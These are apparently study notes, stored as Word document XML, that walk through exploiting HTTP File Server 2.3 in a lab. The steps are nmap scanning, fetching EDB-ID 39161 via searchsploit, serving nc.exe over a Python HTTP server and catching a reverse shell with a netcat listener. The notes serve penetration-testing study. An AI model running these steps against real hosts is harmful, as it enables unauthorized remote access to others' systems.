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F65EC" w14:textId="6D41EA13" w:rsidR="00853ABF" w:rsidRPr="008C3F4C" w:rsidRDefault="00FA1D50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixing Exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E79400" w14:textId="77777777" w:rsidR="00FA1D50" w:rsidRDefault="00FA1D50"/>
    <w:p w14:paraId="53038BF3" w14:textId="450ADADE" w:rsidR="00DC4EF3" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t>Identify vulnerable service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7764B" w14:textId="0E4AA49D" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t>Find it’s exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07130617" w14:textId="12B7FCDC" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t>Copy and modify it to make it work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A031E35" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="7B01A17E" w14:textId="3FE936D9" w:rsidR="008C3F4C" w:rsidRPr="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D890D65" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="10C2A711" w14:textId="41E3EFD3" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68477508" w14:textId="166066FD" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http file server 2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569FA893" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="7B841873" w14:textId="71C9FF34" w:rsidR="00B6223A" w:rsidRPr="00624A4D" w:rsidRDefault="00B6223A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">#EDB-ID= </w:t>
      </w:r>
      <w:r w:rsidR="00624A4D" w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>39161.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD397E" w14:textId="6A2B1BA9" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t>Cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06C650" w14:textId="45108193" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m EDB-ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55FA50" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="136847F2" w14:textId="2A0915DA" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t># Now we have exploits, very important step is to analyze it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F11676" w14:textId="1BA0D4A4" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t># Open it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5E44B7" w14:textId="7DE3FFD1" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t xml:space="preserve"># There is the code of it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the information about the exploit what it does how to run it and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA3A9C0" w14:textId="6DBFA773" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C">
      <w:r>
        <w:t>Vim EDB-ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EAC02" w14:textId="2451E200" w:rsidR="008C3F4C" w:rsidRDefault="00B6223A">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>make</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the ch</w:t>
      </w:r>
      <w:r w:rsidR="00624A4D">
        <w:t>anges as required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D1582" w14:textId="435C3AD5" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>according</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the documentation in exploit do the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aactions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE3CAC" w14:textId="6B0A6812" w:rsidR="00624A4D" w:rsidRDefault="00624A4D"/>
    <w:p w14:paraId="14DDEC8D" w14:textId="013374F3" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t xml:space="preserve">Cp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/windows-resources/binaries/nc.exe .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B41BDF9" w14:textId="4020D38A" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t># copy exe to desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5E0C4" w14:textId="77777777" w:rsidR="00624A4D" w:rsidRDefault="00624A4D"/>
    <w:p w14:paraId="722221B2" w14:textId="1CA11759" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671BD4F1" w14:textId="72D65FDF" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t xml:space="preserve"># exploit and nc.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75247ECF" w14:textId="77777777" w:rsidR="00624A4D" w:rsidRDefault="00624A4D"/>
    <w:p w14:paraId="70C9D179" w14:textId="2B4F60E7" w:rsidR="00624A4D" w:rsidRPr="00624A4D" w:rsidRDefault="00624A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C826BE" w:rsidRPr="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C95AD5" w14:textId="67728458" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t xml:space="preserve">Python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15039575" w14:textId="77777777" w:rsidR="00624A4D" w:rsidRDefault="00624A4D"/>
    <w:p w14:paraId="69146F29" w14:textId="1E43D502" w:rsidR="00624A4D" w:rsidRPr="00624A4D" w:rsidRDefault="00624A4D" w:rsidP="00624A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C826BE" w:rsidRPr="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B983420" w14:textId="6AED73D2" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF2AA0C" w14:textId="29DDF347" w:rsidR="00624A4D" w:rsidRDefault="00624A4D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the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must be same as specified in the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1059E2" w14:textId="00D55587" w:rsidR="00624A4D" w:rsidRDefault="00C826BE">
      <w:r>
        <w:t xml:space="preserve"> # after running multiple </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we get command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A587E" w14:textId="77777777" w:rsidR="00C826BE" w:rsidRDefault="00C826BE"/>
    <w:p w14:paraId="546C9295" w14:textId="3C4F8578" w:rsidR="00C826BE" w:rsidRDefault="00C826BE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D13383" w14:textId="77777777" w:rsidR="00C826BE" w:rsidRDefault="00C826BE"/>
    <w:p w14:paraId="312C95C6" w14:textId="548F7337" w:rsidR="00624A4D" w:rsidRPr="00624A4D" w:rsidRDefault="00624A4D" w:rsidP="00624A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C826BE" w:rsidRPr="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r w:rsidR="00C826BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00624A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7055499D" w14:textId="77777777" w:rsidR="00624A4D" w:rsidRDefault="00624A4D" w:rsidP="00624A4D">
      <w:r>
        <w:t xml:space="preserve">Python EDB-ID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D98DB" w14:textId="77777777" w:rsidR="00B6223A" w:rsidRDefault="00B6223A"/>
    <w:p w14:paraId="49160D6E" w14:textId="77777777" w:rsidR="00B6223A" w:rsidRDefault="00B6223A"/>
    <w:p w14:paraId="2BAB4809" w14:textId="77777777" w:rsidR="00B6223A" w:rsidRDefault="00B6223A"/>
    <w:p w14:paraId="28CA2202" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="1C6B1F48" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="513D22B4" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="6E666E63" w14:textId="653B8BDF" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:p w14:paraId="4CB88B2E" w14:textId="77777777" w:rsidR="008C3F4C" w:rsidRDefault="008C3F4C"/>
    <w:sectPr w:rsidR="008C3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54"/>
    <w:rsid w:val="001918BC"/>
    <w:rsid w:val="003E73BD"/>
    <w:rsid w:val="00443029"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00624A4D"/>
    <w:rsid w:val="00747AEF"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008C3F4C"/>
    <w:rsid w:val="00B6223A"/>
    <w:rsid w:val="00C826BE"/>
    <w:rsid w:val="00D71ADC"/>
    <w:rsid w:val="00DC4EF3"/>
    <w:rsid w:val="00E50D54"/>
    <w:rsid w:val="00FA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F23EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6E369390-60EA-4C39-A177-CA9BF46CF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D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100</Words>
  <Characters>756</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>108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16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-28T06:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-28T07:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>